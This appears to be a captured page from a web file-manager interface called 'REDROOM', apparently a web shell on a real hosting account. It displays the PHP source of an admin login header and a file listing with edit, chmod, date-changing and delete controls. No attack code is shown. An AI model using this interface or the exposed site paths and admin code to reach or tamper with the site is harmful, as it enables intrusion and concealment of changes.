REDROOM
PHP 8.1.33
Path:
Logout
Edit File
Size: 2.40 KB
Close
/home/jambtst2015/public_html/giraffeng.com/admin/includes/login_header.php
Text
Base64
<?php error_reporting(0);session_start(); ob_start(); include("lib/conn.php"); // function redirectToHTTPS() // { if($_SERVER['HTTPS']!="on") { if (substr($_SERVER['HTTP_HOST'], 0, 4) != 'www.') { $redirect= "https://www.".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; } else { $redirect= "https://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; } header("Location:$redirect"); } //} //redirectToHTTPS(); $currentFile = $_SERVER["PHP_SELF"]; $parts = Explode('/', $currentFile); $pageName = $parts[count($parts) - 1]; if(empty($_SESSION['sat_login_id'])){$_SESSION['sat_login_id']='';} if($pageName != 'forgotpass.php'){ if($_SESSION['sat_login_id'] != '') { header('location:index.php'); exit(); } } include("functions.php"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Giraffeng : Admin</title> <link href="css/style.css" rel="stylesheet" type="text/css" /> <script src="js/jquery-1.8.2.min.js" type="text/javascript"></script> <!--jquery validation--> <link rel="stylesheet" href="css/validationEngine.jquery.css" type="text/css"/> <link rel="stylesheet" href="css/template.css" type="text/css"/> <script src="js/jquery-1.8.2.min.js" type="text/javascript"></script> <script src="js/jquery.validationEngine-en.js" type="text/javascript" charset="utf-8"></script> <script src="js/jquery.validationEngine.js" type="text/javascript" charset="utf-8"></script> <!--end--> <script type="text/javascript"> <!--load rightpanel--> function changeDateTime(){ $('#date_time').load('<?php echo $site_path; ?>currentdatetime.php'); } setInterval('changeDateTime();',60000); <!--end--> </script> </head> <body class="login-page"> <div class="wrapper"> <div class="header_section"> <div class="header_container"> <div class="logo_section"><a href="index.php"><img src="images/logo.png" width="205" height="59" /></a></div> <div class="quick_submit_section"> <div class="clock_section_left"> <img src="images/clock.png" width="16" height="16" style="margin-left:373px;" /> <p><span id="date_time"><?php echo date("d M, Y | g:i a", time()); //echo getTime(); ?> EST</span></p> <div class="clear"></div> </div> </div> <div class="clear"></div> </div> </div> <div class="body_section"> <div class="body_container">
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 11
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
error_log
87.70 KB
lrw-r--r--
2025-11-04 01:10:16
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
footer.php
4.07 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
head.php
3.03 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
header-backp-15-7-2015.php
11.30 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
header.php
12.18 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
libmail.php
9.58 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
login_footer.php
436 B
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
login_header.php
2.40 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
login_header_bk_11-7-16.php
2.04 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
other_footer.php
425 B
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
other_header.php
2.53 KB
lrw-r--r--
2024-11-22 17:53:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).